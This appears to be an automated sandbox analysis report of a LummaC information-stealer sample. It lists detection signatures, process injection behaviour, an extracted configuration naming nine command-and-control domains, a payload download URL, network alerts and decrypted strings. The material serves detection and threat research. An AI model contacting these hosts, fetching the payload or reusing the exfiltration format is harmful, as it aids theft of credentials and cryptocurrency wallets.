Edit tour

Windows Analysis Report
TZ33WZy6QL.exe

Overview

General Information

Sample name:	TZ33WZy6QL.exe renamed because original name is a hash value
Original sample name:	aa167e9969d9b0dc9a2f2936bd397f31.exe
Analysis ID:	1551974
MD5:	aa167e9969d9b0dc9a2f2936bd397f31
SHA1:	80f2c9019c64111a16576ceafb99add5cfacbad7
SHA256:	af626d15eb3b97487bd43c2a0ff5ea78993c35a522f81cb708abcfd1b088f0d1
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Compiles code for process injection (via .Net compiler)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

TZ33WZy6QL.exe (PID: 6072 cmdline: "C:\Users\user\Desktop\TZ33WZy6QL.exe" MD5: AA167E9969D9B0DC9A2F2936BD397F31)

csc.exe (PID: 7016 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

conhost.exe (PID: 2492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 6984 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A5B.tmp" "c:\Users\user\AppData\Local\Temp\1l2s0ln0\CSC85B0E78DF15C46CA993256ECF87E3F19.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

RegAsm.exe (PID: 4588 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["conceszustyb.shop", "worddosofrm.shop", "standartedby.shop", "knifedxejsu.cyou", "nightybinybz.shop", "bakedstusteeb.shop", "moutheventushz.shop", "respectabosiz.shop", "mutterissuen.shop"], "Build id": "HpOoIh--@topgcr"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: TZ33WZy6QL.exe PID: 6072	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 4588	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\TZ33WZy6QL.exe", ParentImage: C:\Users\user\Desktop\TZ33WZy6QL.exe, ParentProcessId: 6072, ParentProcessName: TZ33WZy6QL.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.cmdline", ProcessId: 7016, ProcessName: csc.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\TZ33WZy6QL.exe, ProcessId: 6072, TargetFilename: C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.cmdline

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\TZ33WZy6QL.exe", ParentImage: C:\Users\user\Desktop\TZ33WZy6QL.exe, ParentProcessId: 6072, ParentProcessName: TZ33WZy6QL.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.cmdline", ProcessId: 7016, ProcessName: csc.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T12:02:47.244723+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.9	49816	TCP
2024-11-08T12:03:25.590514+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.9	49983	TCP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T12:02:33.173108+0100	2028371	3	Unknown Traffic	192.168.2.9	49738	172.67.187.9	443	TCP
2024-11-08T12:02:34.864321+0100	2028371	3	Unknown Traffic	192.168.2.9	49749	172.67.187.9	443	TCP
2024-11-08T12:02:36.107812+0100	2028371	3	Unknown Traffic	192.168.2.9	49755	172.67.187.9	443	TCP
2024-11-08T12:02:37.547069+0100	2028371	3	Unknown Traffic	192.168.2.9	49766	172.67.187.9	443	TCP
2024-11-08T12:02:38.773732+0100	2028371	3	Unknown Traffic	192.168.2.9	49772	172.67.187.9	443	TCP
2024-11-08T12:02:41.273657+0100	2028371	3	Unknown Traffic	192.168.2.9	49788	172.67.187.9	443	TCP
2024-11-08T12:02:42.666705+0100	2028371	3	Unknown Traffic	192.168.2.9	49794	172.67.187.9	443	TCP
2024-11-08T12:02:44.498002+0100	2028371	3	Unknown Traffic	192.168.2.9	49805	172.67.187.9	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T12:02:33.925723+0100	2054653	1	A Network Trojan was detected	192.168.2.9	49738	172.67.187.9	443	TCP
2024-11-08T12:02:35.353808+0100	2054653	1	A Network Trojan was detected	192.168.2.9	49749	172.67.187.9	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T12:02:33.925723+0100	2049836	1	A Network Trojan was detected	192.168.2.9	49738	172.67.187.9	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T12:02:35.353808+0100	2049812	1	A Network Trojan was detected	192.168.2.9	49749	172.67.187.9	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (knifedxejsu .cyou in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T12:02:33.173108+0100	2057285	1	Domain Observed Used for C2 Detected	192.168.2.9	49738	172.67.187.9	443	TCP
2024-11-08T12:02:34.864321+0100	2057285	1	Domain Observed Used for C2 Detected	192.168.2.9	49749	172.67.187.9	443	TCP
2024-11-08T12:02:36.107812+0100	2057285	1	Domain Observed Used for C2 Detected	192.168.2.9	49755	172.67.187.9	443	TCP
2024-11-08T12:02:37.547069+0100	2057285	1	Domain Observed Used for C2 Detected	192.168.2.9	49766	172.67.187.9	443	TCP
2024-11-08T12:02:38.773732+0100	2057285	1	Domain Observed Used for C2 Detected	192.168.2.9	49772	172.67.187.9	443	TCP
2024-11-08T12:02:41.273657+0100	2057285	1	Domain Observed Used for C2 Detected	192.168.2.9	49788	172.67.187.9	443	TCP
2024-11-08T12:02:42.666705+0100	2057285	1	Domain Observed Used for C2 Detected	192.168.2.9	49794	172.67.187.9	443	TCP
2024-11-08T12:02:44.498002+0100	2057285	1	Domain Observed Used for C2 Detected	192.168.2.9	49805	172.67.187.9	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T12:02:30.037683+0100	2019714	2	Potentially Bad Traffic	192.168.2.9	49717	147.45.44.131	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (knifedxejsu .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T12:02:32.509783+0100	2057284	1	Domain Observed Used for C2 Detected	192.168.2.9	63293	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-08T12:02:43.937994+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.9	49794	172.67.187.9	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: TZ33WZy6QL.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://knifedxejsu.cyou/apiO	Avira URL Cloud: Label: malware
Source: https://knifedxejsu.cyou:443/apiHtPyoG	Avira URL Cloud: Label: malware
Source: http://147.45.44.131/infopage/tbg9.exe	Avira URL Cloud: Label: malware
Source: https://knifedxejsu.cyou/8	Avira URL Cloud: Label: malware
Source: https://knifedxejsu.cyou:443/api	Avira URL Cloud: Label: malware
Source: knifedxejsu.cyou	Avira URL Cloud: Label: malware
Source: https://knifedxejsu.cyou/api	Avira URL Cloud: Label: malware
Source: https://knifedxejsu.cyou/s	Avira URL Cloud: Label: malware
Source: https://knifedxejsu.cyou:443/apioufONBU$	Avira URL Cloud: Label: malware
Source: https://knifedxejsu.cyou:443/apid8pi.default-release/key4.dbPK	Avira URL Cloud: Label: malware
Source: https://knifedxejsu.cyou/	Avira URL Cloud: Label: malware
Source: https://knifedxejsu.cyou/-	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.dll

Avira: detection malicious, Label: HEUR/AGEN.1300034

Found malware configuration

Source: 0.2.TZ33WZy6QL.exe.2715034.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["conceszustyb.shop", "worddosofrm.shop", "standartedby.shop", "knifedxejsu.cyou", "nightybinybz.shop", "bakedstusteeb.shop", "moutheventushz.shop", "respectabosiz.shop", "mutterissuen.shop"], "Build id": "HpOoIh--@topgcr"}

Multi AV Scanner detection for submitted file

Source: TZ33WZy6QL.exe

ReversingLabs: Detection: 52%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: TZ33WZy6QL.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: moutheventushz.shop
Source: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: respectabosiz.shop
Source: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: bakedstusteeb.shop
Source: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: conceszustyb.shop
Source: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: nightybinybz.shop
Source: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: standartedby.shop
Source: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: mutterissuen.shop
Source: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: worddosofrm.shop
Source: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: knifedxejsu.cyou
Source: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000005.00000002.1502864790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: HpOoIh--@topgcr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_00418D6F CryptUnprotectData,

5_2_00418D6F

Source: unknown	HTTPS traffic detected: 172.67.187.9:443 -> 192.168.2.9:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.9:443 -> 192.168.2.9:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.9:443 -> 192.168.2.9:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.9:443 -> 192.168.2.9:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.9:443 -> 192.168.2.9:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.9:443 -> 192.168.2.9:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.9:443 -> 192.168.2.9:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.187.9:443 -> 192.168.2.9:49794 version: TLS 1.2

Source: TZ33WZy6QL.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: q6C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.pdb source: TZ33WZy6QL.exe, 00000000.00000002.1383275515.00000000026E4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\1l2s0ln0\1l2s0ln0.pdbL source: TZ33WZy6QL.exe, 00000000.00000002.1382538159.000000000092B000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, eax	5_2_004358F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	5_2_0043F880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 33079CCDh	5_2_0043F9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+5E07836Bh]	5_2_0041DAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 9ABDB589h	5_2_00438330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], C0A4C970h	5_2_00440330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+eax+000000ACh]	5_2_00429C7C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_00418D6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	5_2_00418D6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esi+10h], ecx	5_2_0042B503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	5_2_0042B503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 9ABDB589h	5_2_004247C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 9ABDB589h	5_2_004247C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	5_2_0041B840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-62492198h]	5_2_0041B840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-5424758Ch]	5_2_0043D840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi+2DC2A8D6h]	5_2_0043D840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [eax+ebx], 30303030h	5_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [eax+ebx], 20202020h	5_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	5_2_0041102F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], cl	5_2_0042B0EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [eax+edi*8], B62B8D10h	5_2_004230A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, ecx	5_2_0040F0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	5_2_00428140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 3E416E49h	5_2_00439140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-000000E7h]	5_2_00439140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 3E416E49h	5_2_00439140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [eax+edx]	5_2_00439940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi+25h]	5_2_00408960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push esi	5_2_0041F963
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [esi+edi+02h], 0000h	5_2_004269E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebp, edx	5_2_004269E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+0Ch]	5_2_00401277
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	5_2_00407210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	5_2_00432A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push eax	5_2_004222ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h	5_2_00436350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 3568C09Bh	5_2_0041A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B282C971h	5_2_00421379
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [eax], cl	5_2_004293B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ecx], ax	5_2_0043BBB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [ebp-18h]	5_2_0043BBB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	5_2_00424C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebp, word ptr [eax]	5_2_0043FCC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, ecx	5_2_004194AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+eax]	5_2_0043CCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h	5_2_0043CCB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi+eax-01h], 00000030h	5_2_004014B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+eax+000000ACh]	5_2_00429C75
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	5_2_00404D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	5_2_0041D570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, edx	5_2_00419D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 3568C09Bh	5_2_00417502
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ebx], ax	5_2_0041C513
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 3E416E49h	5_2_00439D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [ebx], ax	5_2_0041C52A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx+44D9AB7Fh]	5_2_00423DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	5_2_00405DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebp, eax	5_2_0040A5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-000000EBh]	5_2_00438580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	5_2_00411DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push eax	5_2_0043B65F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, 00000001h	5_2_00418602
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, ebp	5_2_00423E07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [esi+edi+02h], 0000h	5_2_004266F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebp, edx	5_2_004266F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+08h]	5_2_004366F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+7517AB4Fh]	5_2_004366F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	5_2_00420750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], B62B8D10h	5_2_00438700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+08h]	5_2_0040FF28
